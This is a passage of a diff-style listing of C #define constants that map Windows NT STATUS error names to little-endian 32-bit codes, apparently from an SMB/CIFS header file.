+-#define STATUS_FLOAT_INVALID_OPERATION cpu_to_le32(0xC0000090)
+-#define STATUS_FLOAT_OVERFLOW cpu_to_le32(0xC0000091)
+-#define STATUS_FLOAT_STACK_CHECK cpu_to_le32(0xC0000092)
+-#define STATUS_FLOAT_UNDERFLOW cpu_to_le32(0xC0000093)
+-#define STATUS_INTEGER_DIVIDE_BY_ZERO cpu_to_le32(0xC0000094)
+-#define STATUS_INTEGER_OVERFLOW cpu_to_le32(0xC0000095)
+-#define STATUS_PRIVILEGED_INSTRUCTION cpu_to_le32(0xC0000096)
+-#define STATUS_TOO_MANY_PAGING_FILES cpu_to_le32(0xC0000097)
+-#define STATUS_FILE_INVALID cpu_to_le32(0xC0000098)
+-#define STATUS_ALLOTTED_SPACE_EXCEEDED cpu_to_le32(0xC0000099)
+-#define STATUS_INSUFFICIENT_RESOURCES cpu_to_le32(0xC000009A)
+-#define STATUS_DFS_EXIT_PATH_FOUND cpu_to_le32(0xC000009B)
+-#define STATUS_DEVICE_DATA_ERROR cpu_to_le32(0xC000009C)
+-#define STATUS_DEVICE_NOT_CONNECTED cpu_to_le32(0xC000009D)
+-#define STATUS_DEVICE_POWER_FAILURE cpu_to_le32(0xC000009E)
+-#define STATUS_FREE_VM_NOT_AT_BASE cpu_to_le32(0xC000009F)
+-#define STATUS_MEMORY_NOT_ALLOCATED cpu_to_le32(0xC00000A0)
+-#define STATUS_WORKING_SET_QUOTA cpu_to_le32(0xC00000A1)
+-#define STATUS_MEDIA_WRITE_PROTECTED cpu_to_le32(0xC00000A2)
+-#define STATUS_DEVICE_NOT_READY cpu_to_le32(0xC00000A3)
+-#define STATUS_INVALID_GROUP_ATTRIBUTES cpu_to_le32(0xC00000A4)
+-#define STATUS_BAD_IMPERSONATION_LEVEL cpu_to_le32(0xC00000A5)
+-#define STATUS_CANT_OPEN_ANONYMOUS cpu_to_le32(0xC00000A6)
+-#define STATUS_BAD_VALIDATION_CLASS cpu_to_le32(0xC00000A7)
+-#define STATUS_BAD_TOKEN_TYPE cpu_to_le32(0xC00000A8)
+-#define STATUS_BAD_MASTER_BOOT_RECORD cpu_to_le32(0xC00000A9)
+-#define STATUS_INSTRUCTION_MISALIGNMENT cpu_to_le32(0xC00000AA)
+-#define STATUS_INSTANCE_NOT_AVAILABLE cpu_to_le32(0xC00000AB)
+-#define STATUS_PIPE_NOT_AVAILABLE cpu_to_le32(0xC00000AC)
+-#define STATUS_INVALID_PIPE_STATE cpu_to_le32(0xC00000AD)
+-#define STATUS_PIPE_BUSY cpu_to_le32(0xC00000AE)
+-#define STATUS_ILLEGAL_FUNCTION cpu_to_le32(0xC00000AF)
+-#define STATUS_PIPE_DISCONNECTED cpu_to_le32(0xC00000B0)
+-#define STATUS_PIPE_CLOSING cpu_to_le32(0xC00000B1)
+-#define STATUS_PIPE_CONNECTED cpu_to_le32(0xC00000B2)
+-#define STATUS_PIPE_LISTENING cpu_to_le32(0xC00000B3)
+-#define STATUS_INVALID_READ_MODE cpu_to_le32(0xC00000B4)
+-#define STATUS_IO_TIMEOUT cpu_to_le32(0xC00000B5)
+-#define STATUS_FILE_FORCED_CLOSED cpu_to_le32(0xC00000B6)
+-#define STATUS_PROFILING_NOT_STARTED cpu_to_le32(0xC00000B7)
+-#define STATUS_PROFILING_NOT_STOPPED cpu_to_le32(0xC00000B8)
+-#define STATUS_COULD_NOT_INTERPRET cpu_to_le32(0xC00000B9)
+-#define STATUS_FILE_IS_A_DIRECTORY cpu_to_le32(0xC00000BA)
+-#define STATUS_NOT_SUPPORTED cpu_to_le32(0xC00000BB)
+-#define STATUS_REMOTE_NOT_LISTENING cpu_to_le32(0xC00000BC)
+-#define STATUS_DUPLICATE_NAME cpu_to_le32(0xC00000BD)
+-#define STATUS_BAD_NETWORK_PATH cpu_to_le32(0xC00000BE)
+-#define STATUS_NETWORK_BUSY cpu_to_le32(0xC00000BF)
+-#define STATUS_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC00000C0)
+-#define STATUS_TOO_MANY_COMMANDS cpu_to_le32(0xC00000C1)
+-#define STATUS_ADAPTER_HARDWARE_ERROR cpu_to_le32(0xC00000C2)
+-#define STATUS_INVALID_NETWORK_RESPONSE cpu_to_le32(0xC00000C3)
+-#define STATUS_UNEXPECTED_NETWORK_ERROR cpu_to_le32(0xC00000C4)
+-#define STATUS_BAD_REMOTE_ADAPTER cpu_to_le32(0xC00000C5)
+-#define STATUS_PRINT_QUEUE_FULL cpu_to_le32(0xC00000C6)
+-#define STATUS_NO_SPOOL_SPACE cpu_to_le32(0xC00000C7)
+-#define STATUS_PRINT_CANCELLED cpu_to_le32(0xC00000C8)
+-#define STATUS_NETWORK_NAME_DELETED cpu_to_le32(0xC00000C9)
+-#define STATUS_NETWORK_ACCESS_DENIED cpu_to_le32(0xC00000CA)
+-#define STATUS_BAD_DEVICE_TYPE cpu_to_le32(0xC00000CB)
+-#define STATUS_BAD_NETWORK_NAME cpu_to_le32(0xC00000CC)
+-#define STATUS_TOO_MANY_NAMES cpu_to_le32(0xC00000CD)
+-#define STATUS_TOO_MANY_SESSIONS cpu_to_le32(0xC00000CE)
+-#define STATUS_SHARING_PAUSED cpu_to_le32(0xC00000CF)
+-#define STATUS_REQUEST_NOT_ACCEPTED cpu_to_le32(0xC00000D0)
+-#define STATUS_REDIRECTOR_PAUSED cpu_to_le32(0xC00000D1)
+-#define STATUS_NET_WRITE_FAULT cpu_to_le32(0xC00000D2)
+-#define STATUS_PROFILING_AT_LIMIT cpu_to_le32(0xC00000D3)
+-#define STATUS_NOT_SAME_DEVICE cpu_to_le32(0xC00000D4)
+-#define STATUS_FILE_RENAMED cpu_to_le32(0xC00000D5)
+-#define STATUS_VIRTUAL_CIRCUIT_CLOSED cpu_to_le32(0xC00000D6)
+-#define STATUS_NO_SECURITY_ON_OBJECT cpu_to_le32(0xC00000D7)
+-#define STATUS_CANT_WAIT cpu_to_le32(0xC00000D8)
+-#define STATUS_PIPE_EMPTY cpu_to_le32(0xC00000D9)
+-#define STATUS_CANT_ACCESS_DOMAIN_INFO cpu_to_le32(0xC00000DA)
+-#define STATUS_CANT_TERMINATE_SELF cpu_to_le32(0xC00000DB)
+-#define STATUS_INVALID_SERVER_STATE cpu_to_le32(0xC00000DC)
+-#define STATUS_INVALID_DOMAIN_STATE cpu_to_le32(0xC00000DD)
+-#define STATUS_INVALID_DOMAIN_ROLE cpu_to_le32(0xC00000DE)
+-#define STATUS_NO_SUCH_DOMAIN cpu_to_le32(0xC00000DF)
+-#define STATUS_DOMAIN_EXISTS cpu_to_le32(0xC00000E0)
+-#define STATUS_DOMAIN_LIMIT_EXCEEDED cpu_to_le32(0xC00000E1)
+-#define STATUS_OPLOCK_NOT_GRANTED cpu_to_le32(0xC00000E2)
+-#define STATUS_INVALID_OPLOCK_PROTOCOL cpu_to_le32(0xC00000E3)
+-#define STATUS_INTERNAL_DB_CORRUPTION cpu_to_le32(0xC00000E4)
+-#define STATUS_INTERNAL_ERROR cpu_to_le32(0xC00000E5)
+-#define STATUS_GENERIC_NOT_MAPPED cpu_to_le32(0xC00000E6)
+-#define STATUS_BAD_DESCRIPTOR_FORMAT cpu_to_le32(0xC00000E7)
+-#define STATUS_INVALID_USER_BUFFER cpu_to_le32(0xC00000E8)
+-#define STATUS_UNEXPECTED_IO_ERROR cpu_to_le32(0xC00000E9)
+-#define STATUS_UNEXPECTED_MM_CREATE_ERR cpu_to_le32(0xC00000EA)
+-#define STATUS_UNEXPECTED_MM_MAP_ERROR cpu_to_le32(0xC00000EB)
+-#define STATUS_UNEXPECTED_MM_EXTEND_ERR cpu_to_le32(0xC00000EC)
+-#define STATUS_NOT_LOGON_PROCESS cpu_to_le32(0xC00000ED)
+-#define STATUS_LOGON_SESSION_EXISTS cpu_to_le32(0xC00000EE)
+-#define STATUS_INVALID_PARAMETER_1 cpu_to_le32(0xC00000EF)
+-#define STATUS_INVALID_PARAMETER_2 cpu_to_le32(0xC00000F0)
+-#define STATUS_INVALID_PARAMETER_3 cpu_to_le32(0xC00000F1)
+-#define STATUS_INVALID_PARAMETER_4 cpu_to_le32(0xC00000F2)
+-#define STATUS_INVALID_PARAMETER_5 cpu_to_le32(0xC00000F3)
+-#define STATUS_INVALID_PARAMETER_6 cpu_to_le32(0xC00000F4)
+-#define STATUS_INVALID_PARAMETER_7 cpu_to_le32(0xC00000F5)
+-#define STATUS_INVALID_PARAMETER_8 cpu_to_le32(0xC00000F6)
+-#define STATUS_INVALID_PARAMETER_9 cpu_to_le32(0xC00000F7)
+-#define STATUS_INVALID_PARAMETER_10 cpu_to_le32(0xC00000F8)
+-#define STATUS_INVALID_PARAMETER_11 cpu_to_le32(0xC00000F9)
+-#define STATUS_INVALID_PARAMETER_12 cpu_to_le32(0xC00000FA)
+-#define STATUS_REDIRECTOR_NOT_STARTED cpu_to_le32(0xC00000FB)
+-#define STATUS_REDIRECTOR_STARTED cpu_to_le32(0xC00000FC)
+-#define STATUS_STACK_OVERFLOW cpu_to_le32(0xC00000FD)
+-#define STATUS_NO_SUCH_PACKAGE cpu_to_le32(0xC00000FE)
+-#define STATUS_BAD_FUNCTION_TABLE cpu_to_le32(0xC00000FF)
+-#define STATUS_VARIABLE_NOT_FOUND cpu_to_le32(0xC0000100)
+-#define STATUS_DIRECTORY_NOT_EMPTY cpu_to_le32(0xC0000101)
+-#define STATUS_FILE_CORRUPT_ERROR cpu_to_le32(0xC0000102)
+-#define STATUS_NOT_A_DIRECTORY cpu_to_le32(0xC0000103)
+-#define STATUS_BAD_LOGON_SESSION_STATE cpu_to_le32(0xC0000104)
+-#define STATUS_LOGON_SESSION_COLLISION cpu_to_le32(0xC0000105)
+-#define STATUS_NAME_TOO_LONG cpu_to_le32(0xC0000106)
+-#define STATUS_FILES_OPEN cpu_to_le32(0xC0000107)
+-#define STATUS_CONNECTION_IN_USE cpu_to_le32(0xC0000108)
+-#define STATUS_MESSAGE_NOT_FOUND cpu_to_le32(0xC0000109)
+-#define STATUS_PROCESS_IS_TERMINATING cpu_to_le32(0xC000010A)
+-#define STATUS_INVALID_LOGON_TYPE cpu_to_le32(0xC000010B)
+-#define STATUS_NO_GUID_TRANSLATION cpu_to_le32(0xC000010C)
+-#define STATUS_CANNOT_IMPERSONATE cpu_to_le32(0xC000010D)
+-#define STATUS_IMAGE_ALREADY_LOADED cpu_to_le32(0xC000010E)
+-#define STATUS_ABIOS_NOT_PRESENT cpu_to_le32(0xC000010F)
+-#define STATUS_ABIOS_LID_NOT_EXIST cpu_to_le32(0xC0000110)
+-#define STATUS_ABIOS_LID_ALREADY_OWNED cpu_to_le32(0xC0000111)
+-#define STATUS_ABIOS_NOT_LID_OWNER cpu_to_le32(0xC0000112)
+-#define STATUS_ABIOS_INVALID_COMMAND cpu_to_le32(0xC0000113)
+-#define STATUS_ABIOS_INVALID_LID cpu_to_le32(0xC0000114)
+-#define STATUS_ABIOS_SELECTOR_NOT_AVAILABLE cpu_to_le32(0xC0000115)
+-#define STATUS_ABIOS_INVALID_SELECTOR cpu_to_le32(0xC0000116)
+-#define STATUS_NO_LDT cpu_to_le32(0xC0000117)
+-#define STATUS_INVALID_LDT_SIZE cpu_to_le32(0xC0000118)
+-#define STATUS_INVALID_LDT_OFFSET cpu_to_le32(0xC0000119)
+-#define STATUS_INVALID_LDT_DESCRIPTOR cpu_to_le32(0xC000011A)
+-#define STATUS_INVALID_IMAGE_NE_FORMAT cpu_to_le32(0xC000011B)
+-#define STATUS_RXACT_INVALID_STATE cpu_to_le32(0xC000011C)
+-#define STATUS_RXACT_COMMIT_FAILURE cpu_to_le32(0xC000011D)
+-#define STATUS_MAPPED_FILE_SIZE_ZERO cpu_to_le32(0xC000011E)
+-#define STATUS_TOO_MANY_OPENED_FILES cpu_to_le32(0xC000011F)
+-#define STATUS_CANCELLED cpu_to_le32(0xC0000120)
+-#define STATUS_CANNOT_DELETE cpu_to_le32(0xC0000121)
+-#define STATUS_INVALID_COMPUTER_NAME cpu_to_le32(0xC0000122)
+-#define STATUS_FILE_DELETED cpu_to_le32(0xC0000123)
+-#define STATUS_SPECIAL_ACCOUNT cpu_to_le32(0xC0000124)
+-#define STATUS_SPECIAL_GROUP cpu_to_le32(0xC0000125)
+-#define STATUS_SPECIAL_USER cpu_to_le32(0xC0000126)
+-#define STATUS_MEMBERS_PRIMARY_GROUP cpu_to_le32(0xC0000127)
+-#define STATUS_FILE_CLOSED cpu_to_le32(0xC0000128)
+-#define STATUS_TOO_MANY_THREADS cpu_to_le32(0xC0000129)
+-#define STATUS_THREAD_NOT_IN_PROCESS cpu_to_le32(0xC000012A)
+-#define STATUS_TOKEN_ALREADY_IN_USE cpu_to_le32(0xC000012B)
+-#define STATUS_PAGEFILE_QUOTA_EXCEEDED cpu_to_le32(0xC000012C)
+-#define STATUS_COMMITMENT_LIMIT cpu_to_le32(0xC000012D)
+-#define STATUS_INVALID_IMAGE_LE_FORMAT cpu_to_le32(0xC000012E)
+-#define STATUS_INVALID_IMAGE_NOT_MZ cpu_to_le32(0xC000012F)
+-#define STATUS_INVALID_IMAGE_PROTECT cpu_to_le32(0xC0000130)
+-#define STATUS_INVALID_IMAGE_WIN_16 cpu_to_le32(0xC0000131)
+-#define STATUS_LOGON_SERVER_CONFLICT cpu_to_le32(0xC0000132)
+-#define STATUS_TIME_DIFFERENCE_AT_DC cpu_to_le32(0xC0000133)
+-#define STATUS_SYNCHRONIZATION_REQUIRED cpu_to_le32(0xC0000134)
+-#define STATUS_DLL_NOT_FOUND cpu_to_le32(0xC0000135)
+-#define STATUS_OPEN_FAILED cpu_to_le32(0xC0000136)
+-#define STATUS_IO_PRIVILEGE_FAILED cpu_to_le32(0xC0000137)
+-#define STATUS_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000138)
+-#define STATUS_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000139)
+-#define STATUS_CONTROL_C_EXIT cpu_to_le32(0xC000013A)
+-#define STATUS_LOCAL_DISCONNECT cpu_to_le32(0xC000013B)
+-#define STATUS_REMOTE_DISCONNECT cpu_to_le32(0xC000013C)
+-#define STATUS_REMOTE_RESOURCES cpu_to_le32(0xC000013D)
+-#define STATUS_LINK_FAILED cpu_to_le32(0xC000013E)
+-#define STATUS_LINK_TIMEOUT cpu_to_le32(0xC000013F)
+-#define STATUS_INVALID_CONNECTION cpu_to_le32(0xC0000140)
+-#define STATUS_INVALID_ADDRESS cpu_to_le32(0xC0000141)
+-#define STATUS_DLL_INIT_FAILED cpu_to_le32(0xC0000142)
+-#define STATUS_MISSING_SYSTEMFILE cpu_to_le32(0xC0000143)
+-#define STATUS_UNHANDLED_EXCEPTION cpu_to_le32(0xC0000144)
+-#define STATUS_APP_INIT_FAILURE cpu_to_le32(0xC0000145)
+-#define STATUS_PAGEFILE_CREATE_FAILED cpu_to_le32(0xC0000146)
+-#define STATUS_NO_PAGEFILE cpu_to_le32(0xC0000147)
+-#define STATUS_INVALID_LEVEL cpu_to_le32(0xC0000148)
+-#define STATUS_WRONG_PASSWORD_CORE cpu_to_le32(0xC0000149)
+-#define STATUS_ILLEGAL_FLOAT_CONTEXT cpu_to_le32(0xC000014A)
+-#define STATUS_PIPE_BROKEN cpu_to_le32(0xC000014B)
+-#define STATUS_REGISTRY_CORRUPT cpu_to_le32(0xC000014C)
+-#define STATUS_REGISTRY_IO_FAILED cpu_to_le32(0xC000014D)
+-#define STATUS_NO_EVENT_PAIR cpu_to_le32(0xC000014E)
+-#define STATUS_UNRECOGNIZED_VOLUME cpu_to_le32(0xC000014F)
+-#define STATUS_SERIAL_NO_DEVICE_INITED cpu_to_le32(0xC0000150)
+-#define STATUS_NO_SUCH_ALIAS cpu_to_le32(0xC0000151)
+-#define STATUS_MEMBER_NOT_IN_ALIAS cpu_to_le32(0xC0000152)
+-#define STATUS_MEMBER_IN_ALIAS cpu_to_le32(0xC0000153)
+-#define STATUS_ALIAS_EXISTS cpu_to_le32(0xC0000154)
+-#define STATUS_LOGON_NOT_GRANTED cpu_to_le32(0xC0000155)
+-#define STATUS_TOO_MANY_SECRETS cpu_to_le32(0xC0000156)
+-#define STATUS_SECRET_TOO_LONG cpu_to_le32(0xC0000157)
+-#define STATUS_INTERNAL_DB_ERROR cpu_to_le32(0xC0000158)
+-#define STATUS_FULLSCREEN_MODE cpu_to_le32(0xC0000159)
+-#define STATUS_TOO_MANY_CONTEXT_IDS cpu_to_le32(0xC000015A)
+-#define STATUS_LOGON_TYPE_NOT_GRANTED cpu_to_le32(0xC000015B)
+-#define STATUS_NOT_REGISTRY_FILE cpu_to_le32(0xC000015C)
+-#define STATUS_NT_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000015D)
+-#define STATUS_DOMAIN_CTRLR_CONFIG_ERROR cpu_to_le32(0xC000015E)
+-#define STATUS_FT_MISSING_MEMBER cpu_to_le32(0xC000015F)
+-#define STATUS_ILL_FORMED_SERVICE_ENTRY cpu_to_le32(0xC0000160)
+-#define STATUS_ILLEGAL_CHARACTER cpu_to_le32(0xC0000161)
+-#define STATUS_UNMAPPABLE_CHARACTER cpu_to_le32(0xC0000162)
+-#define STATUS_UNDEFINED_CHARACTER cpu_to_le32(0xC0000163)
+-#define STATUS_FLOPPY_VOLUME cpu_to_le32(0xC0000164)
+-#define STATUS_FLOPPY_ID_MARK_NOT_FOUND cpu_to_le32(0xC0000165)
+-#define STATUS_FLOPPY_WRONG_CYLINDER cpu_to_le32(0xC0000166)
+-#define STATUS_FLOPPY_UNKNOWN_ERROR cpu_to_le32(0xC0000167)
+-#define STATUS_FLOPPY_BAD_REGISTERS cpu_to_le32(0xC0000168)
+-#define STATUS_DISK_RECALIBRATE_FAILED cpu_to_le32(0xC0000169)
+-#define STATUS_DISK_OPERATION_FAILED cpu_to_le32(0xC000016A)
+-#define STATUS_DISK_RESET_FAILED cpu_to_le32(0xC000016B)
+-#define STATUS_SHARED_IRQ_BUSY cpu_to_le32(0xC000016C)
+-#define STATUS_FT_ORPHANING cpu_to_le32(0xC000016D)
+-#define STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT cpu_to_le32(0xC000016E)
+-#define STATUS_PARTITION_FAILURE cpu_to_le32(0xC0000172)
+-#define STATUS_INVALID_BLOCK_LENGTH cpu_to_le32(0xC0000173)
+-#define STATUS_DEVICE_NOT_PARTITIONED cpu_to_le32(0xC0000174)
+-#define STATUS_UNABLE_TO_LOCK_MEDIA cpu_to_le32(0xC0000175)
+-#define STATUS_UNABLE_TO_UNLOAD_MEDIA cpu_to_le32(0xC0000176)
+-#define STATUS_EOM_OVERFLOW cpu_to_le32(0xC0000177)
+-#define STATUS_NO_MEDIA cpu_to_le32(0xC0000178)
+-#define STATUS_NO_SUCH_MEMBER cpu_to_le32(0xC000017A)
+-#define STATUS_INVALID_MEMBER cpu_to_le32(0xC000017B)
+-#define STATUS_KEY_DELETED cpu_to_le32(0xC000017C)
+-#define STATUS_NO_LOG_SPACE cpu_to_le32(0xC000017D)
+-#define STATUS_TOO_MANY_SIDS cpu_to_le32(0xC000017E)
+-#define STATUS_LM_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000017F)
+-#define STATUS_KEY_HAS_CHILDREN cpu_to_le32(0xC0000180)
+-#define STATUS_CHILD_MUST_BE_VOLATILE cpu_to_le32(0xC0000181)
+-#define STATUS_DEVICE_CONFIGURATION_ERROR cpu_to_le32(0xC0000182)
+-#define STATUS_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC0000183)
+-#define STATUS_INVALID_DEVICE_STATE cpu_to_le32(0xC0000184)
+-#define STATUS_IO_DEVICE_ERROR cpu_to_le32(0xC0000185)
+-#define STATUS_DEVICE_PROTOCOL_ERROR cpu_to_le32(0xC0000186)
+-#define STATUS_BACKUP_CONTROLLER cpu_to_le32(0xC0000187)
+-#define STATUS_LOG_FILE_FULL cpu_to_le32(0xC0000188)
+-#define STATUS_TOO_LATE cpu_to_le32(0xC0000189)
+-#define STATUS_NO_TRUST_LSA_SECRET cpu_to_le32(0xC000018A)
+-#define STATUS_NO_TRUST_SAM_ACCOUNT cpu_to_le32(0xC000018B)
+-#define STATUS_TRUSTED_DOMAIN_FAILURE cpu_to_le32(0xC000018C)
+-#define STATUS_TRUSTED_RELATIONSHIP_FAILURE cpu_to_le32(0xC000018D)
+-#define STATUS_EVENTLOG_FILE_CORRUPT cpu_to_le32(0xC000018E)
+-#define STATUS_EVENTLOG_CANT_START cpu_to_le32(0xC000018F)
+-#define STATUS_TRUST_FAILURE cpu_to_le32(0xC0000190)
+-#define STATUS_MUTANT_LIMIT_EXCEEDED cpu_to_le32(0xC0000191)
+-#define STATUS_NETLOGON_NOT_STARTED cpu_to_le32(0xC0000192)
+-#define STATUS_ACCOUNT_EXPIRED cpu_to_le32(0xC0000193)
+-#define STATUS_POSSIBLE_DEADLOCK cpu_to_le32(0xC0000194)
+-#define STATUS_NETWORK_CREDENTIAL_CONFLICT cpu_to_le32(0xC0000195)
+-#define STATUS_REMOTE_SESSION_LIMIT cpu_to_le32(0xC0000196)
+-#define STATUS_EVENTLOG_FILE_CHANGED cpu_to_le32(0xC0000197)
+-#define STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT cpu_to_le32(0xC0000198)
+-#define STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT cpu_to_le32(0xC0000199)
+-#define STATUS_NOLOGON_SERVER_TRUST_ACCOUNT cpu_to_le32(0xC000019A)
+-#define STATUS_DOMAIN_TRUST_INCONSISTENT cpu_to_le32(0xC000019B)
+-#define STATUS_FS_DRIVER_REQUIRED cpu_to_le32(0xC000019C)
+-#define STATUS_IMAGE_ALREADY_LOADED_AS_DLL cpu_to_le32(0xC000019D)
+-#define STATUS_NETWORK_OPEN_RESTRICTION cpu_to_le32(0xC0000201)
+-#define STATUS_NO_USER_SESSION_KEY cpu_to_le32(0xC0000202)
+-#define STATUS_USER_SESSION_DELETED cpu_to_le32(0xC0000203)
+-#define STATUS_RESOURCE_LANG_NOT_FOUND cpu_to_le32(0xC0000204)
+-#define STATUS_INSUFF_SERVER_RESOURCES cpu_to_le32(0xC0000205)
+-#define STATUS_INVALID_BUFFER_SIZE cpu_to_le32(0xC0000206)
+-#define STATUS_INVALID_ADDRESS_COMPONENT cpu_to_le32(0xC0000207)
+-#define STATUS_INVALID_ADDRESS_WILDCARD cpu_to_le32(0xC0000208)
+-#define STATUS_TOO_MANY_ADDRESSES cpu_to_le32(0xC0000209)
+-#define STATUS_ADDRESS_ALREADY_EXISTS cpu_to_le32(0xC000020A)
+-#define STATUS_ADDRESS_CLOSED cpu_to_le32(0xC000020B)
+-#define STATUS_CONNECTION_DISCONNECTED cpu_to_le32(0xC000020C)
+-#define STATUS_CONNECTION_RESET cpu_to_le32(0xC000020D)
+-#define STATUS_TOO_MANY_NODES cpu_to_le32(0xC000020E)
+-#define STATUS_TRANSACTION_ABORTED cpu_to_le32(0xC000020F)
+-#define STATUS_TRANSACTION_TIMED_OUT cpu_to_le32(0xC0000210)
+-#define STATUS_TRANSACTION_NO_RELEASE cpu_to_le32(0xC0000211)
+-#define STATUS_TRANSACTION_NO_MATCH cpu_to_le32(0xC0000212)
+-#define STATUS_TRANSACTION_RESPONDED cpu_to_le32(0xC0000213)
+-#define STATUS_TRANSACTION_INVALID_ID cpu_to_le32(0xC0000214)
+-#define STATUS_TRANSACTION_INVALID_TYPE cpu_to_le32(0xC0000215)
+-#define STATUS_NOT_SERVER_SESSION cpu_to_le32(0xC0000216)
+-#define STATUS_NOT_CLIENT_SESSION cpu_to_le32(0xC0000217)
+-#define STATUS_CANNOT_LOAD_REGISTRY_FILE cpu_to_le32(0xC0000218)
+-#define STATUS_DEBUG_ATTACH_FAILED cpu_to_le32(0xC0000219)
+-#define STATUS_SYSTEM_PROCESS_TERMINATED cpu_to_le32(0xC000021A)
+-#define STATUS_DATA_NOT_ACCEPTED cpu_to_le32(0xC000021B)
+-#define STATUS_NO_BROWSER_SERVERS_FOUND cpu_to_le32(0xC000021C)
+-#define STATUS_VDM_HARD_ERROR cpu_to_le32(0xC000021D)
+-#define STATUS_DRIVER_CANCEL_TIMEOUT cpu_to_le32(0xC000021E)
+-#define STATUS_REPLY_MESSAGE_MISMATCH cpu_to_le32(0xC000021F)
+-#define STATUS_MAPPED_ALIGNMENT cpu_to_le32(0xC0000220)
+-#define STATUS_IMAGE_CHECKSUM_MISMATCH cpu_to_le32(0xC0000221)
+-#define STATUS_LOST_WRITEBEHIND_DATA cpu_to_le32(0xC0000222)
+-#define STATUS_CLIENT_SERVER_PARAMETERS_INVALID cpu_to_le32(0xC0000223)
+-#define STATUS_PASSWORD_MUST_CHANGE cpu_to_le32(0xC0000224)
+-#define STATUS_NOT_FOUND cpu_to_le32(0xC0000225)
+-#define STATUS_NOT_TINY_STREAM cpu_to_le32(0xC0000226)
+-#define STATUS_RECOVERY_FAILURE cpu_to_le32(0xC0000227)
+-#define STATUS_STACK_OVERFLOW_READ cpu_to_le32(0xC0000228)
+-#define STATUS_FAIL_CHECK cpu_to_le32(0xC0000229)
+-#define STATUS_DUPLICATE_OBJECTID cpu_to_le32(0xC000022A)
+-#define STATUS_OBJECTID_EXISTS cpu_to_le32(0xC000022B)
+-#define STATUS_CONVERT_TO_LARGE cpu_to_le32(0xC000022C)
+-#define STATUS_RETRY cpu_to_le32(0xC000022D)
+-#define STATUS_FOUND_OUT_OF_SCOPE cpu_to_le32(0xC000022E)
+-#define STATUS_ALLOCATE_BUCKET cpu_to_le32(0xC000022F)
+-#define STATUS_PROPSET_NOT_FOUND cpu_to_le32(0xC0000230)
+-#define STATUS_MARSHALL_OVERFLOW cpu_to_le32(0xC0000231)
+-#define STATUS_INVALID_VARIANT cpu_to_le32(0xC0000232)
+-#define STATUS_DOMAIN_CONTROLLER_NOT_FOUND cpu_to_le32(0xC0000233)
+-#define STATUS_ACCOUNT_LOCKED_OUT cpu_to_le32(0xC0000234)
+-#define STATUS_HANDLE_NOT_CLOSABLE cpu_to_le32(0xC0000235)
+-#define STATUS_CONNECTION_REFUSED cpu_to_le32(0xC0000236)
+-#define STATUS_GRACEFUL_DISCONNECT cpu_to_le32(0xC0000237)
+-#define STATUS_ADDRESS_ALREADY_ASSOCIATED cpu_to_le32(0xC0000238)
+-#define STATUS_ADDRESS_NOT_ASSOCIATED cpu_to_le32(0xC0000239)
+-#define STATUS_CONNECTION_INVALID cpu_to_le32(0xC000023A)
+-#define STATUS_CONNECTION_ACTIVE cpu_to_le32(0xC000023B)
+-#define STATUS_NETWORK_UNREACHABLE cpu_to_le32(0xC000023C)
+-#define STATUS_HOST_UNREACHABLE cpu_to_le32(0xC000023D)
+-#define STATUS_PROTOCOL_UNREACHABLE cpu_to_le32(0xC000023E)
+-#define STATUS_PORT_UNREACHABLE cpu_to_le32(0xC000023F)
+-#define STATUS_REQUEST_ABORTED cpu_to_le32(0xC0000240)
+-#define STATUS_CONNECTION_ABORTED cpu_to_le32(0xC0000241)
+-#define STATUS_BAD_COMPRESSION_BUFFER cpu_to_le32(0xC0000242)
+-#define STATUS_USER_MAPPED_FILE cpu_to_le32(0xC0000243)
+-#define STATUS_AUDIT_FAILED cpu_to_le32(0xC0000244)
+-#define STATUS_TIMER_RESOLUTION_NOT_SET cpu_to_le32(0xC0000245)
+-#define STATUS_CONNECTION_COUNT_LIMIT cpu_to_le32(0xC0000246)
+-#define STATUS_LOGIN_TIME_RESTRICTION cpu_to_le32(0xC0000247)
+-#define STATUS_LOGIN_WKSTA_RESTRICTION cpu_to_le32(0xC0000248)
+-#define STATUS_IMAGE_MP_UP_MISMATCH cpu_to_le32(0xC0000249)
+-#define STATUS_INSUFFICIENT_LOGON_INFO cpu_to_le32(0xC0000250)
+-#define STATUS_BAD_DLL_ENTRYPOINT cpu_to_le32(0xC0000251)
+-#define STATUS_BAD_SERVICE_ENTRYPOINT cpu_to_le32(0xC0000252)
+-#define STATUS_LPC_REPLY_LOST cpu_to_le32(0xC0000253)
+-#define STATUS_IP_ADDRESS_CONFLICT1 cpu_to_le32(0xC0000254)
+-#define STATUS_IP_ADDRESS_CONFLICT2 cpu_to_le32(0xC0000255)
+-#define STATUS_REGISTRY_QUOTA_LIMIT cpu_to_le32(0xC0000256)
+-#define STATUS_PATH_NOT_COVERED cpu_to_le32(0xC0000257)
+-#define STATUS_NO_CALLBACK_ACTIVE cpu_to_le32(0xC0000258)
+-#define STATUS_LICENSE_QUOTA_EXCEEDED cpu_to_le32(0xC0000259)
+-#define STATUS_PWD_TOO_SHORT cpu_to_le32(0xC000025A)
+-#define STATUS_PWD_TOO_RECENT cpu_to_le32(0xC000025B)
+-#define STATUS_PWD_HISTORY_CONFLICT cpu_to_le32(0xC000025C)
+-#define STATUS_PLUGPLAY_NO_DEVICE cpu_to_le32(0xC000025E)
+-#define STATUS_UNSUPPORTED_COMPRESSION cpu_to_le32(0xC000025F)
+-#define STATUS_INVALID_HW_PROFILE cpu_to_le32(0xC0000260)
+-#define STATUS_INVALID_PLUGPLAY_DEVICE_PATH cpu_to_le32(0xC0000261)
+-#define STATUS_DRIVER_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000262)
+-#define STATUS_DRIVER_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000263)
+-#define STATUS_RESOURCE_NOT_OWNED cpu_to_le32(0xC0000264)
+-#define STATUS_TOO_MANY_LINKS cpu_to_le32(0xC0000265)
+-#define STATUS_QUOTA_LIST_INCONSISTENT cpu_to_le32(0xC0000266)
+-#define STATUS_FILE_IS_OFFLINE cpu_to_le32(0xC0000267)
+-#define STATUS_EVALUATION_EXPIRATION cpu_to_le32(0xC0000268)
